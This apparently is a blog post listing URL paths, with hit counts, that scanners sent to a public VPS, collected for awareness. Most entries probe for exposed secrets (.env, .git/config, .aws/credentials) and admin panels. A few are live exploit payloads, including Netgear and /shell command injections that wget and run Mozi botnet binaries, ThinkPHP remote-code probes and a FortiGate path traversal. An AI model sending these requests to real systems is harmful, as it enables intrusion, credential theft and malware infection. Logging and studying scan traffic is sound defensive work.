url pattern from potential attackers' scanner
If your cloud VPS opens a common port (like 80, 8080) to public internet, there will attract lots of scanner or unknown users scanning every day and night, here I collect and extract the common url pattern sending from scanner or unknown users for a certain period of time.
850 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
375 /.git/config
374 /boaform/admin/formLogin
352 /?XDEBUG_SESSION_START=phpstorm
308 /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21
257 /Autodiscover/Autodiscover.xml
251 /_ignition/execute-solution
238 /console/
223 /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application
217 /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f
213 /actuator/gateway/routes
189 /owa/auth/logon.aspx
187 /actuator/health
177 /owa/auth/x.js
165 /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>
165 /solr/admin/info/system?wt=json
155 /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
148 /config/getuser?index=0
129 /HNAP1/
117 /mifs/.;/services/LogService
110 /_profiler/empty/search/results
105 /wp-login.php
98 /.aws/credentials
98 /.well-known/security.txt
97 /_profiler/phpinfo
80 /laravel/.env
78 /login
77 /core/.env
77 /info.php
76 /GponForm/diag_Form?style/
71 /GponForm/diag_Form?images/
65 /app/.env
65 /sdk
64 /HNAP1
63 /hudson
63 /portal/redlion
62 /c/version.js
61 /stalker_portal/c/version.js
60 /flu/403.html
60 /streaming/clients_live.php
60 /stream/live.php
60 /system_api.php
59 /.git/HEAD
59 /manager/html
57 /api/.env
55 /admin/.env
55 /config.js
55 /phpinfo.php
55 /public/.env
55 ///remote/fgt_lang?lang=/../../../..//////////dev/
54 /.env.save
53 /config.json
53 /ReportServer
52 /fuN3
49 /ab2g
49 /phpinfo
46 /.env.bak
46 /local/.env
44 /.DS_Store
44 /sitemap
44 /sitemap.txt
43 /pools
43 /scripts/WPnBr.dll
43 /?Z72446562432Q1
42 /CSS/Miniweb.css
42 /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
41 /__Additional
41 /phpmyadmin/index.php
41 /Portal0000.htm
41 /Portal/Portal.mwsl
40 /index.php
39 /ab2h
39 /h5/
39 /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
38 /docs/cplugError.html/
38 /xmlrpc.php
37 /pools/default/buckets
36 /backend/.env
36 /xmlrpc.php?rsd
34 /blog/wp-includes/wlwmanifest.xml
34 /cms/wp-includes/wlwmanifest.xml
34 /site/wp-includes/wlwmanifest.xml
34 /test/wp-includes/wlwmanifest.xml
34 /web/wp-includes/wlwmanifest.xml
34 /wordpress/wp-includes/wlwmanifest.xml
34 /wp1/wp-includes/wlwmanifest.xml
34 /wp/wp-includes/wlwmanifest.xml
33 /cgi-bin/luci
33 /vendor/.env
32 /version
31 /news/wp-includes/wlwmanifest.xml
31 /sito/wp-includes/wlwmanifest.xml
31 /website/wp-includes/wlwmanifest.xml
31 /wp2/wp-includes/wlwmanifest.xml
31 /wp-includes/wlwmanifest.xml
30 /boaform/admin/formLogin?username=admin&psd=admin
30 /prod/.env
29 /ajax
28 /FD873AC4-CF86-4FED-84EC-4BD59C6F17A7
28 /homes/
28 /Public/home/js/check.js
28 /web/.env
27 /app/
26 /api/notice
26 /api/user/ismustmobile
26 /application/.env
26 /boaform/admin/formLogin?username=adminisp&psd=adminisp
26 /frontend_dev.php/$
26 /script
26 /wap/
25 /admin/
25 /admin.shtml
25 /api/link/platform
25 /apps/.env
25 /crm/.env
25 /database/.env
25 /echo.php
25 /login.html
25 /m/
25 /manager/text/list
25 /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
25 /src/.env
24 /api/linkPF
24 /c/
24 /map/baidumap.xml
24 /phpmyadmin/
24 /server-status
23 /conf/.env
23 /evox/about
23 /rb/getip.php?Z72446562432Q1
23 /stalker_portal/server/tools/auth_simple.php
22 /jenkins/login
22 /solr/
21 /docker/.env
21 /storage/.env
21 /telescope/requests
21 /vendor/laravel/.env
20 /admin.php
20 /boaform/admin/formLogin?username=user&psd=user
20 /config/.env
20 /.env.prod
20 /.git
20 /login.action
20 /mgmt/tm/util/bash
20 /protected/.env
20 /readme.txt
20 /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
19 /0bef
19 /cdn-cgi/trace
19 /ip.php?Z72446562432Q1
19 /shop/wp-includes/wlwmanifest.xml
19 /system/.env
19 /test.php
19 /wp-content/
18 /app/config/.env
18 /blog/.env
18 /boaform/admin/formLogin?username=ec8&psd=ec8
18 /cgi-bin/.env
18 /config/aws.yml
18 /editBlackAndWhiteList
18 /en/.env
18 /ghksjdghdfksanitycheckqwerjlhfgjksdghlid
18 /index.html
18 /tomcatwar.jsp
18 /tomcatwar.jsp?pwd=j&cmd=id
17 /2019/wp-includes/wlwmanifest.xml
17 /audio/.env
17 /base/.env
17 /debug/default/view?panel=config
17 /dev/.env
17 /library/.env
17 /metrics
17 /new/.env
17 /old/.env
17 /shell.php
17 /showLogin.cc
17 /sites/all/libraries/mailchimp/.env
17 /www/.env
16 /1phpmyadmin/index.php?lang=en
16 /2phpmyadmin/index.php?lang=en
16 /admin/db/index.php?lang=en
16 /admin/index.php?lang=en
16 /administrator/admin/index.php?lang=en
16 /administrator/db/index.php?lang=en
16 /administrator/phpmyadmin/index.php?lang=en
16 /administrator/phpMyAdmin/index.php?lang=en
16 /administrator/pma/index.php?lang=en
16 /administrator/PMA/index.php?lang=en
16 /administrator/web/index.php?lang=en
16 /admin/phpmyadmin/index.php?lang=en
16 /admin/phpMyAdmin/index.php?lang=en
16 /admin/pma/index.php?lang=en
16 /admin/sqladmin/index.php?lang=en
16 /admin/sysadmin/index.php?lang=en
16 /admin/web/index.php?lang=en
16 /cgi-bin/index2.asp
16 /database/index.php?lang=en
16 /dbadmin/index.php?lang=en
16 /db/db-admin/index.php?lang=en
16 /db/dbadmin/index.php?lang=en
16 /db/dbweb/index.php?lang=en
16 /db/index.php?lang=en
16 /db/myadmin/index.php?lang=en
16 /db/phpmyadmin3/index.php?lang=en
16 /db/phpMyAdmin-3/index.php?lang=en
16 /db/phpMyAdmin3/index.php?lang=en
16 /db/phpmyadmin4/index.php?lang=en
16 /db/phpMyAdmin-4/index.php?lang=en
16 /db/phpmyadmin5/index.php?lang=en
16 /db/phpMyAdmin-5/index.php?lang=en
16 /db/phpmyadmin/index.php?lang=en
16 /db/phpMyAdmin/index.php?lang=en
16 /db/webadmin/index.php?lang=en
16 /db/webdb/index.php?lang=en
16 /db/websql/index.php?lang=en
16 /dns-query
16 /myadmin/index.php?lang=en
16 /MyAdmin/index.php?lang=en
16 /mysql-admin/index.php?lang=en
16 /mysql/admin/index.php?lang=en
16 /mysqladmin/index.php?lang=en
16 /mysql/dbadmin/index.php?lang=en
16 /mysql/db/index.php?lang=en
16 /mysql/index.php?lang=en
16 /mysqlmanager/index.php?lang=en
16 /mysql/mysqlmanager/index.php?lang=en
16 /mysql/pma/index.php?lang=en
16 /mysql/pMA/index.php?lang=en
16 /mysql/sqlmanager/index.php?lang=en
16 /mysql/web/index.php?lang=en
16 /phpmyadmin1/index.php?lang=en
16 /phpMyAdmin1/index.php?lang=en
16 /phpmyadmin2011/index.php?lang=en
16 /phpmyadmin2012/index.php?lang=en
16 /phpmyadmin2013/index.php?lang=en
16 /phpmyadmin2014/index.php?lang=en
16 /phpmyadmin2015/index.php?lang=en
16 /phpmyadmin2016/index.php?lang=en
16 /phpmyadmin2017/index.php?lang=en
16 /phpmyadmin2018/index.php?lang=en
16 /phpmyadmin2019/index.php?lang=en
16 /phpmyadmin2020/index.php?lang=en
16 /phpmyadmin2021/index.php?lang=en
16 /phpmyadmin2022/index.php?lang=en
16 /phpmyadmin2/index.php?lang=en
16 /phpMyAdmin2/index.php?lang=en
16 /phpmyadmin3/index.php?lang=en
16 /phpMyAdmin-3/index.php?lang=en
16 /phpMyAdmin3/index.php?lang=en
16 /phpMyAdmin-4.9.7/index.php?lang=en
16 /phpmyadmin4/index.php?lang=en
16 /phpMyAdmin-4/index.php?lang=en
16 /phpMyAdmin4/index.php?lang=en
16 /phpMyAdmin-5.1.0/index.php?lang=en
16 /phpMyAdmin-5.1.1/index.php?lang=en
16 /phpMyAdmin-5.1.2/index.php?lang=en
16 /phpMyAdmin-5.1.3/index.php?lang=en
16 /phpMyAdmin5.1/index.php?lang=en
16 /phpMyAdmin-5.2.0/index.php?lang=en
16 /phpMyAdmin5.2/index.php?lang=en
16 /phpmyadmin5/index.php?lang=en
16 /phpMyAdmin-5/index.php?lang=en
16 /phpMyAdmin5/index.php?lang=en
16 /_phpmyadmin/index.php?lang=en
16 /_phpmyadmin_/index.php?lang=en
16 /php-my-admin/index.php?lang=en
16 /php-myadmin/index.php?lang=en
16 /phpmy-admin/index.php?lang=en
16 /phpmyadmin/index.php?lang=en
16 /phpmyadmin_/index.php?lang=en
16 /phpmyAdmin/index.php?lang=en
16 /phpMyadmin/index.php?lang=en
16 /_phpMyAdmin/index.php?lang=en
16 /phpMyAdmin/index.php?lang=en
16 /phpMyAdmin_/index.php?lang=en
16 /phpmy/index.php?lang=en
16 /phppma/index.php?lang=en
16 /pma/index.php?lang=en
16 /PMA/index.php?lang=en
16 /program/index.php?lang=en
16 /query
16 /resolve
16 /rest/.env
16 /room/getRoomBangFans
16 /shopdb/index.php?lang=en
16 /sqlmanager/index.php?lang=en
16 /sql/myadmin/index.php?lang=en
16 /sql/phpmanager/index.php?lang=en
16 /sql/phpMyAdmin2/index.php?lang=en
16 /sql/phpmyadmin3/index.php?lang=en
16 /sql/phpmyadmin4/index.php?lang=en
16 /sql/phpmyadmin5/index.php?lang=en
16 /sql/php-myadmin/index.php?lang=en
16 /sql/phpmy-admin/index.php?lang=en
16 /sql/phpMyAdmin/index.php?lang=en
16 /sql/sql-admin/index.php?lang=en
16 /sql/sqladmin/index.php?lang=en
16 /sql/sql/index.php?lang=en
16 /sql/sqlweb/index.php?lang=en
16 /sql/webadmin/index.php?lang=en
16 /sql/webdb/index.php?lang=en
16 /sql/websql/index.php?lang=en
16 /webfig/
16 /wp-admin/.env
16 /wp-content/.env
16 /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
15 /aws.yml
15 /ip?Z72446562432Q1
15 /manager/js/left.js
15 /newsite/.env
15 /style.css
15 /Telerik.Web.UI.WebResource.axd?type=rau
15 /web_shell_cmd.gch
14 /api/lottery/color
14 /api/message/webInfo
14 /api/uploads/apimap
14 /Content/m_1/js/m_1_Jquery.js
14 /css/style.css
14 /h5
14 /Home/GetAllGameCategory
14 /index.htm
14 /js/common.js
14 /js/json.js
14 /km.asmx/getPlatParam
14 /login/kefuxian.mvc
14 /Public/css/_pk10.css
14 /public/css/style.css
14 /Recruit/download_url
14 /site/.env
14 /staging/.env
14 /static/guide/ab.css
14 /static/wap/css/trade-history.css
14 /static/wap/js/common.js
14 /us/img/nyyh/chkjs.js
14 /v2/start/config
Reference: https://www.metasploit.com/get-started
Disclaimer
- License under
CC BY-NC 4.0 - Copyright issue feedback
me#imzye.me, replace # with @ - Not all the commands and scripts are tested in production environment, use at your own risk
- No privacy information is collected here